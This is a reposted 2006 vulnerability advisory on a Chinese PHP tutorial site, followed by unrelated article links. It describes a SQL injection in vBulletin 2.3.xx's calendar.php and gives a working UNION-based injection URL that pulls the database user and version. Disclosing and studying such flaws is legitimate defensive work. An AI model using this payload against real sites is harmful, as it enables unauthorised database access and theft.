编程 PHP

vBulletin Forum 2.3.xx SQL Injection

Posted in PHP onOctober 09, 2006

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

vBulletin Forum 2.3.xx SQL Injection

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

PHP 增加了对 .ZIP 文件的读取功能

Oct 09 PHP

如何做到多笔资料的同步

Oct 09 PHP

MySQL数据库转移，access，sql server 转 MySQL 的图文教程

Sep 02 PHP

抓取并下载CSS中所有图片文件的php代码

Sep 26 PHP

php对数组排序的简单实例

Dec 25 PHP

百度地图API应用之获取用户的具体位置

Jun 10 PHP

ThinkPHP空模块和空操作详解

Jun 30 PHP

php中fgetcsv()函数用法实例

Nov 28 PHP

Mar 20 PHP

php自定义中文字符串截取函数substr_for_gb2312及substr_for_utf8示例

May 28 PHP

利用ajax和PHP实现简单的流程管理

Mar 23 PHP

PHP微信H5支付开发实例

Jul 25 PHP

PHP_Flame(Version:Progress)的原代码

Oct 09 #PHP

图形数字验证代码

Oct 09 #PHP

用PHP函数解决SQL injection

Oct 09 #PHP

session 的生命周期是多长

Oct 09 #PHP

做个自己站内搜索引擎

Oct 09 #PHP

用libTemplate实现静态网页的生成

Oct 09 #PHP

php注入实例

Oct 09 #PHP

You might like

PHP+jQuery实现自动补全功能源码

2013/05/15 PHP

thinkPHP实现的联动菜单功能详解

2017/05/05 PHP

php中Ioc(控制反转)和Di(依赖注入)

2017/05/07 PHP

JavaScript 放大镜放大倍率和视窗尺寸

2011/05/09 Javascript

js 利用image对象实现图片的预加载提高访问速度

2013/03/29 Javascript

关于JavaScript对象的动态选择及遍历对象

2014/03/10 Javascript

jquery实现的美女拼图游戏实例

2015/05/04 Javascript

JQuery中DOM事件绑定用法详解

2015/06/13 Javascript

jquery图片滚动放大代码分享（1）

2015/08/25 Javascript

给easyui datebox扩展一个清空的实例

2016/11/09 Javascript

详解微信小程序——自定义圆形进度条

2016/12/29 Javascript

用vue和node写的简易购物车实现

2017/04/25 Javascript

Node.JS文件系统解析实例详解

2017/05/15 Javascript

vue-cli webpack 开发环境跨域详解

2017/05/18 Javascript

基于js中的原型(全面讲解)

2017/09/19 Javascript

使用Vue组件实现一个简单弹窗效果

2018/04/23 Javascript

微信小程序实现图片上传放大预览删除代码

2020/06/28 Javascript

微信小程序使用for循环动态渲染页面操作示例

2018/12/25 Javascript

vue移动端使用canvas签名的实现

2020/01/15 Javascript

原生JavaScript实现刮刮乐

2020/09/29 Javascript

Django视图和URL配置详解

2018/01/31 Python

PyCharm的设置方法和第一个Python程序的建立

2019/01/16 Python

使用Python操作FTP实现上传和下载的方法

2019/04/01 Python

Python的条件锁与事件共享详解

2019/09/12 Python

python实现简单坦克大战

2020/03/27 Python

python virtualenv虚拟环境配置与使用教程详解

2020/07/13 Python

一篇文章带你搞定Ubuntu中打开Pycharm总是卡顿崩溃

2020/11/02 Python

开办饭店创业计划书

2013/12/28 职场文书

大学生期末自我鉴定

2014/02/01 职场文书

计算机数据库专业职业生涯规划书

2014/02/08 职场文书

授权委托书格式模板

2014/04/03 职场文书

中秋节主题班会

2015/08/14 职场文书

一篇文章带你复习java知识点

2021/06/28 Java/Android

SQL实现LeetCode(175.联合两表)

2021/08/04 MySQL

10大幻兽系恶魔果实蝙蝠果实上榜,第一自愈能力强

2022/03/18 日漫

Shell中的单中括号和双中括号的用法详解

2022/12/24 Servers